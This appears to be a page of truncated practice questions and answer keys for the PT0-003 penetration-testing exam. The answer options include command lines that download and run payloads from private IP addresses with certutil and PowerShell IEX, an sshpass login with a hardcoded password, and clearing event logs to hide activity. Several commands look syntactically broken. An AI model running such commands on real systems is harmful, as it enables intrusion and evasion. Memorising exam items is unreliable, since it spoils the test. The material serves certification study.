PT0-003 exam

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?A . powershell.exe impo C:toolsfoo.ps1B . certutil.exe -f https://192.168.0.1/foo.exe bad.exeC . powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")D . rundll32.exe c:pathfoo.dll,functNameView AnswerAnswer: B Explanation: To...

A tester completed a report for a new client. Prior to sharing the report with the client, which of the following should the tester request to complete a review?A . A generative AI assistantB . The customer's designated contactC . A cybersecurity industry peerD . A team memberView AnswerAnswer: D...

During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?A . Clear the Windows event logs.B . Modify the system time.C ....

A penetration tester needs to complete cleanup activities from the testing lead. Which of the following should the tester do to validate that reverse shell payloads are no longer running?A . Run scripts to terminate the implant on affected hosts.B . Spin down the C2 listeners.C . Restore the firewall...

In a file stored in an unprotected source code repository, a penetration tester discovers the following line of code: sshpass -p donotchange ssh [email protected] Which of the following should the tester attempt to do next to take advantage of this information? (Select two).A . Use Nmap to identify all the...

A penetration tester wants to use multiple TTPs to assess the reactions (alerted, blocked, and others) by the client’s current security tools. The threat-modeling team indicates the TTPs in the list might affect their internal systems and servers. Which of the following actions would the tester most likely take?A ....

A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitability?A ....

During a penetration test, the tester uses a vulnerability scanner to collect information about any possible vulnerabilities that could be used to compromise the network. The tester receives the results and then executes the following command: snmpwalk -v 2c -c public 192.168.1.23 Which of the following is the tester trying...

A penetration tester downloads a JAR file that is used in an organization's production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester's activities?A . SASTB . SBOMC . ICSD ....

A tester is performing an external phishing assessment on the top executives at a company. Two-factor authentication is enabled on the executives’ accounts that are in the scope of work. Which of the following should the tester do to get access to these accounts? A. Configure an external domain using...